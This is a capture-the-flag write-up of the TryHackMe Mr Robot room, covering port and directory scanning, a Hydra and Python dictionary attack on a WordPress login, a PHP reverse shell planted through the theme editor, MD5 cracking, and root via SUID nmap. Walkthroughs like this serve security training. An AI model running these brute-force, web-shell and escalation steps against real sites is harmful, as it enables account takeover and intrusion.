TryHackMe: Mr Robot CTF — Writeup

Harshit Maheshwari
May 18 · 6 min read

The writeup for a room in TryHackMe named Mr. Robot.


About TryHackMe

TryHackMe is a great platform for learning cyber security, and a particularly good starting point if you are new to it and don’t know where to begin. It offers rooms, which are essentially vulnerable machines that you can deploy and practice your skills on. The best part about TryHackMe is that it’s very hands-on. If you are new to security, make sure you give it a try.


After deploying the machine on the TryHackMe portal, we get an IP address to access it. It is different every time you deploy, so your ROOM-IP will probably differ from mine.

nmap scan:

We need to know which ports are open and what services are running behind them, so we run nmap against the room IP.

Open ports 80 and 443 indicate a web server speaking HTTP and HTTPS, so we open http://10.10.71.122 and https://10.10.71.122 in the browser.

The website is Mr. Robot themed. Running the commands listed on the page just redirects to other pages with images and videos from the TV show.

Since there is a website, we enumerate its directories to see whether things like a login page or an admin portal exist.

gobuster scan:

So we use a tool called gobuster, which takes an existing wordlist of common directory names, requests each one against the site, and reports the HTTP status code of every response. (If you are using Kali or ParrotOS, the wordlists are under /usr/share/wordlists/dirbuster.)

The output is saved in the file directories.txt

Now let’s look at the directories that returned status code 200:

/readme
/license
/rdf (Interesting..?)
/wp-login (Looks like an admin login page)
/robots

Jackpot: /robots.txt lists two entries, key-1-of-3.txt and fsocity.dic. Opening http://10.10.71.122/key-1-of-3.txt:

Here’s our key 1/3.

Key 1 : Captured!

Now let’s take a look at fsocity.dic.

It looks like a dictionary (a wordlist), so let’s use it for a dictionary attack on the login page we saw earlier.

Trying a login first, we get the error: Invalid username.

Let’s try admin:admin to log in, using Burp Suite to intercept the login request.

The username and password are sent as the POST parameters log and pwd respectively. Note also that WordPress returns a different error for an unknown username (“Invalid username”) than for a known username with a wrong password; that difference is what lets us attack the two fields separately.

Performing the dictionary attack using Hydra

The dictionary is fsocity.dic. In this case the target handed us a wordlist; in other cases we would try common usernames first and then common passwords. You can find these and many other lists at https://github.com/danielmiessler/SecLists.

So first we find the username by keeping the password constant and varying the username (any response that does not contain “Invalid username” marks a hit), then we use the found username and vary the password.

Username changes, password constant

We get the username: Elliot.

Let’s try to login with Elliot:test

We get error: The password you entered for the username Elliot is incorrect.

Username constant, password changes

We get a 9-character password: *********

Using Elliot:********* to login:

After logging in, the dashboard shows that the site is running WordPress 4.3.1.
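Here is the same two-phase attack written out in Python, as an added example (not code from the writeup). The target’s /wp-login.php is replaced by a constructed stand-in, fake_wp_login, that mimics the two distinct WordPress error messages, so the block runs offline; the username “Elliot” it accepts, the password “examplepw” and the wordlist are made up for the demonstration. post_wp_login is the real HTTP transport you would pass instead on a live box, and the equivalent hydra commands are given in the comments.

```python
"""Two-phase dictionary attack against a WordPress login form.

WordPress answers "Invalid username." for an unknown user and
"The password you entered for the username X is incorrect." for a
known one, so the username can be found without knowing any password.
Added example; the fake target, names and wordlist below are constructed.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List, Optional

# Response fragments that act as the oracle.
INVALID_USER = "Invalid username"
BAD_PASSWORD = "is incorrect"

# A "try this login" function: (username, password) -> response body.
Poster = Callable[[str, str], str]


def load_wordlist(lines: Iterable[str]) -> List[str]:
    """Strip, drop blanks and remove duplicates, keeping first-seen order.
    Leaked wordlists are often padded with repeats; deduping first avoids
    sending the same guess many times."""
    seen = set()
    out = []
    for line in lines:
        word = line.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def post_wp_login(login_url: str, user: str, password: str) -> str:
    """Real transport: POST the fields WordPress expects (log / pwd) and
    return the HTML body. Bind the URL with functools.partial."""
    data = urllib.parse.urlencode(
        {"log": user, "pwd": password, "wp-submit": "Log In"}
    ).encode()
    req = urllib.request.Request(login_url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", errors="replace")


def fake_wp_login(user: str, password: str) -> str:
    """Constructed stand-in for the target's wp-login.php (offline demo).
    Credentials are made up; WordPress compares usernames case-insensitively."""
    if user.lower() != "elliot":
        return '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
    if password != "examplepw":
        return ('<div id="login_error"><strong>ERROR</strong>: The password you '
                f'entered for the username {user} is incorrect.</div>')
    return "<html><title>Dashboard</title></html>"  # login succeeded


def enumerate_username(candidates: Iterable[str], post: Poster,
                       probe_password: str = "test") -> Optional[str]:
    """Phase 1: vary the username with a constant password. Any reply that
    does not say "Invalid username" means the account exists.
    Equivalent hydra run (not executed here):
      hydra -L fsocity.dic -p test TARGET http-post-form \
        "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username"
    """
    for user in load_wordlist(candidates):
        if INVALID_USER not in post(user, probe_password):
            return user
    return None


def crack_password(user: str, candidates: Iterable[str], post: Poster) -> Optional[str]:
    """Phase 2: keep the username, vary the password. A reply with neither
    error message is a successful login.
    Equivalent hydra run (not executed here):
      hydra -l Elliot -P fsocity.dic TARGET http-post-form \
        "/wp-login.php:log=^USER^&pwd=^PASS^:F=is incorrect"
    """
    for password in load_wordlist(candidates):
        body = post(user, password)
        if INVALID_USER in body:
            raise ValueError(f"username {user!r} does not exist on the target")
        if BAD_PASSWORD not in body:
            return password
    return None


# Constructed wordlist with the duplicates and blanks a leaked list tends to have.
DEMO_WORDLIST = ["admin", "root", "", "admin", "Elliot", "password", "examplepw", "Elliot"]

if __name__ == "__main__":
    found_user = enumerate_username(DEMO_WORDLIST, fake_wp_login)
    print("username:", found_user)
    if found_user:
        print("password:", crack_password(found_user, DEMO_WORDLIST, fake_wp_login))
    # Live box: post = functools.partial(post_wp_login, "http://TARGET/wp-login.php")
```

The two phases are deliberately split into separate functions because the stop condition differs: phase 1 stops on the first reply that is not “Invalid username”, phase 2 on the first reply that carries neither error. If phase 2 ever sees “Invalid username” the username was wrong, so it raises instead of silently exhausting the list.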

Now we need a reverse shell, so let’s use pentestmonkey’s php-reverse-shell. Kali and ParrotOS already ship it (on Kali it is under /usr/share/webshells/php/); all you have to do is locate it.

If you are not on Kali or ParrotOS, a quick search will find it.

Opening a reverse-shell

In wp-admin, go to the left navigation bar, select Appearance → Editor, and then select Archives (archive.php) on the right.

Once archive.php is open, paste the contents of php-reverse-shell.php into the edit area, replacing what is there.

Now edit the value of the $ip variable and set it to our own IP, so that when the reverse shell runs it knows where to connect back to. Find it with ifconfig; on the TryHackMe VPN it is the address of the tun0 interface. Your edited php-reverse-shell.php should then have $ip set to that address and $port set to the port you will listen on.

You can change the port if you want; just remember which port you chose.

Click Update File, then start a netcat listener on port 1234 (nc -lvnp 1234).

Now trigger the shell by requesting archive.php directly. Check which theme is active (the editor shows it; here it is twentyfifteen) and open the file from that theme’s directory:

Opening http://10.10.162.7/wp-content/themes/twentyfifteen/archive.php

We opened a reverse shell... yay!
We cannot read key-2-of-3.txt: the shell runs as the web server’s user, and the key is only readable by the user robot. We can, however, read password.raw-md5, so let’s do that.

The file name says it all: a raw, unsalted MD5 hash. Let’s use John the Ripper (--format=raw-md5, with fsocity.dic as the wordlist) to crack it.
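The cracking step, as an added Python example (not code from the writeup or from John the Ripper): it does exactly what john does with --format=raw-md5, hashing every unique candidate and comparing. The hash file and wordlist in the block are constructed for the demonstration (the hash is MD5 of “password”, a well-known value); the equivalent john invocation is in a comment.

```python
"""Dictionary attack on an unsalted MD5 hash (what john --format=raw-md5 does).

With no salt, the same password always hashes to the same 32 hex digits,
so one pass over the wordlist cracks it, and a hash cracked once is cracked
for every user who picked that password. Added example; the hash file and
wordlist below are constructed.
"""
import hashlib
from typing import Dict, Iterable, List, Optional, Tuple


def md5_hex(word: str) -> str:
    """Hex digest of the raw MD5 of a candidate, as stored in password.raw-md5."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def parse_hash_file(text: str) -> List[Tuple[Optional[str], str]]:
    """Accept both bare hashes and user:hash lines (the format john reads).
    Returns (user or None, hash) pairs, ignoring blanks and comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, digest = line.rpartition(":")
        digest = digest.lower()
        if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"not a raw MD5 hash: {line!r}")
        entries.append((user if sep else None, digest))
    return entries


def crack_raw_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Hash each unique candidate and compare against the target.
    Equivalent john run (not executed here):
      john --format=raw-md5 --wordlist=fsocity.dic password.raw-md5
    """
    target = target_hex.strip().lower()
    seen = set()
    for line in wordlist:
        word = line.rstrip("\r\n")
        if not word or word in seen:      # skip blanks and repeated candidates
            continue
        seen.add(word)
        if md5_hex(word) == target:
            return word
    return None


def crack_file(text: str, wordlist: List[str]) -> Dict[str, Optional[str]]:
    """Crack every entry of a hash file: {user or hash: plaintext or None}."""
    return {user or digest: crack_raw_md5(digest, wordlist)
            for user, digest in parse_hash_file(text)}


# Constructed inputs: the hash is MD5("password"), a well-known value.
DEMO_HASH_FILE = "demo:5f4dcc3b5aa765d61d8327deb882cf99\n"
DEMO_WORDLIST = ["admin", "fsociety", "password", "robot", "password"]

if __name__ == "__main__":
    print(crack_file(DEMO_HASH_FILE, DEMO_WORDLIST))
```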

Switching to user robot

To switch users we need a proper terminal: su refuses to run without one, and the reverse shell we have is just /bin/sh -i attached to a socket, not a TTY. So we upgrade it to a pseudo-terminal with Python’s pty module (the method from reference 2) and then su to robot with the cracked password.

Opening key-2-of-3.txt

Key 2 : Captured!

Now, to capture the 3rd flag we need root, so we perform privilege escalation. First we look for binaries with the SUID bit set (permission bit 4000); these run with the privileges of their owner rather than of the user who launches them.

We find nmap among them.
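The SUID search as an added Python example (not code from the writeup). It implements what find / -perm -4000 -type f 2>/dev/null does on the box, and shows that 4000 is a mode bit (stat.S_ISUID) rather than a threshold. build_demo_tree creates a throwaway directory with a few constructed files, two of them marked setuid, so the block runs offline without touching the real system.

```python
"""Locate setuid binaries, the starting point for this privilege escalation.

Mode 4000 (octal) is the setuid bit: a file with it set executes with the
privileges of its owner, so a root-owned one is a privilege boundary.
Equivalent shell command (not executed here):
  find / -perm -4000 -type f 2>/dev/null
Added example; the demo tree is constructed, not the target's filesystem.
"""
import os
import stat
import tempfile
from typing import List, Tuple


def find_suid(root: str) -> List[str]:
    """Walk root and return regular files whose mode has the setuid bit,
    as paths relative to root, sorted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)           # lstat: do not follow symlinks
            except OSError:
                continue                      # unreadable entry, like find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def describe(root: str) -> List[Tuple[str, int, str]]:
    """(path, owner uid, octal mode) for each hit; root-owned (uid 0) ones matter most."""
    out = []
    for rel in find_suid(root):
        st = os.lstat(os.path.join(root, rel))
        out.append((rel, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return out


def build_demo_tree() -> str:
    """Constructed filesystem snippet: two setuid files and one ordinary one."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("ls", 0o755), ("su", 0o4755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)                  # chmod ignores the umask, so 4755 stays 4755
    return root


if __name__ == "__main__":
    for entry in describe(build_demo_tree()):
        print(*entry)
```

On a real box the list is dominated by expected entries (su, passwd, sudo and the like); what you are looking for is anything unusual, such as a network tool or an interpreter, which is why nmap stands out here.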

Privilege escalation using nmap

nmap has the SUID bit set. Administrators sometimes do this so that unprivileged users can run the scan types that need raw sockets (SYN scans, OS detection and so on), since those do not work without root privileges.

However, older nmap versions (2.02 through 5.21) have an interactive mode (nmap --interactive) from which you can escape to a shell with the !sh command. Because nmap is SUID root, that shell runs with root privileges, which is how we get the root shell.

Key 3 : Captured!


I’ve had an amazing time in this room and learned a lot. TryHackMe has tons of other rooms, each different from the others, which offers a huge learning opportunity as well. I will try to upload writeups of rooms that I found interesting. For now, I hope you also learned something from this writeup. Cheers! 🍺

Now, let me shamelessly ask you to

Follow me on Github, Twitter, and connect on LinkedIn.

References:

  1. Opening a php reverse shell through the WordPress theme editor: https://pentaroot.com/exploit-wordpress-backdoor-theme-pages/
  2. Upgrading simple shells to fully interactive TTYs with Python: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
  3. Privilege escalation using nmap: https://payatu.com/guide-linux-privilege-escalation

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew